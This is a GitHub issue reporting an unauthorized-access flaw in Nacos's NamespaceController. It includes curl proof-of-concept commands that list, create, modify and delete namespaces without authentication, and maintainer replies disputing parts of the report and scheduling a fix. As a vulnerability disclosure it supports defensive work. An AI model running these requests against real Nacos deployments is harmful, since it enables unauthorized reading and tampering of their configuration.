Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Nacos Unauthorized Vulnerability About NamespaceController #9732

Closed
waterrr opened this issue Dec 20, 2022 · 3 comments
Closed

Nacos Unauthorized Vulnerability About NamespaceController #9732

waterrr opened this issue Dec 20, 2022 · 3 comments
Labels
kind/bug Category issues or prs related to bug.
Milestone
2.2.1

Comments

@waterrr
Copy link

waterrr commented Dec 20, 2022

Nacos Unauthorized Vulnerability About NamespaceController

Hi,I am a security researcher focusing on cloud-native related risks.
When operating on the Namespace in question through the API, even if auth is turned on, it is still possible to operate without authorization.

I've turned on auth
nacos.core.auth.enabled=true

POC:

V1:
curl -X GET 'http://localhost:8848/nacos/v1/console/namespaces'
curl -X POST 'http://localhost:8848/nacos/v1/console/namespaces' -d 'customNamespaceId=&namespaceName=dev&namespaceDesc='
curl -X PUT 'http://localhost:8848/nacos/v1/console/namespaces' -d 'namespace=dev&namespaceShowName=test&namespaceDesc=test'
curl -X DELETE 'http://localhost:8848/nacos/v1/console/namespaces' -d 'namespaceId=dev'

V2:
curl -X GET 'http://127.0.0.1:8848/nacos/v2/console/namespace/list'
curl -d 'namespaceId=test_namespace' -d 'namespaceName=test' -X POST 'http://127.0.0.1:8848/nacos/v2/console/namespace'
curl -d 'namespaceId=test_namespace' -d 'namespaceName=test.nacos' -X PUT 'http://127.0.0.1:8848/nacos/v2/console/namespace'
curl -d 'namespaceId=test_namespace' -X DELETE 'http://127.0.0.1:8848/nacos/v2/console/namespace'

As you can see both V1 and V2 are affected.
I conducted a code audit for this purpose and found some problems in this file.

console/src/main/java/com/alibaba/nacos/console/controller/NamespaceController.java

The code in question is in the above file, and all operations regarding Namespace are not authenticated, which I think is unreasonable.

The section on Namespace operations should include authenticated code, similar to the other interfaces:
@Secured(action = ActionTypes.READ, signType = SignType.CONFIG)

This part of the interface can leak sensitive information(namespace 、namespaceShowName、namespaceDesc、configCount), attackers can even create, modify, and delete it.

Other interfaces(ServerStateController, HealthController) have similar issues, but I don't think they pose a vulnerability exploitation risk for now, and I will continue to support and follow the Nacos project in the hope that the cloud-native environment gets better and better.
@a25017012
Copy link

follow

@KomachiSion
Copy link
Collaborator

KomachiSion commented Dec 21, 2022
edited
Loading

The v1 create delete update` namespace api contain auth check.

The list and get is no auth check because it's public data.

The v2 api has add auth check in 2.2.0 by #9671

@KomachiSion KomachiSion added status/invalid This doesn't seem right kind/bug Category issues or prs related to bug. and removed status/invalid This doesn't seem right labels Dec 21, 2022
@KomachiSion KomachiSion added this to the 2.2.1 milestone Dec 27, 2022
@KomachiSion
Copy link
Collaborator

#9754

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
kind/bug Category issues or prs related to bug.
Projects
None yet
Milestone
2.2.1
Development

No branches or pull requests
3 participants
@waterrr @a25017012 @KomachiSion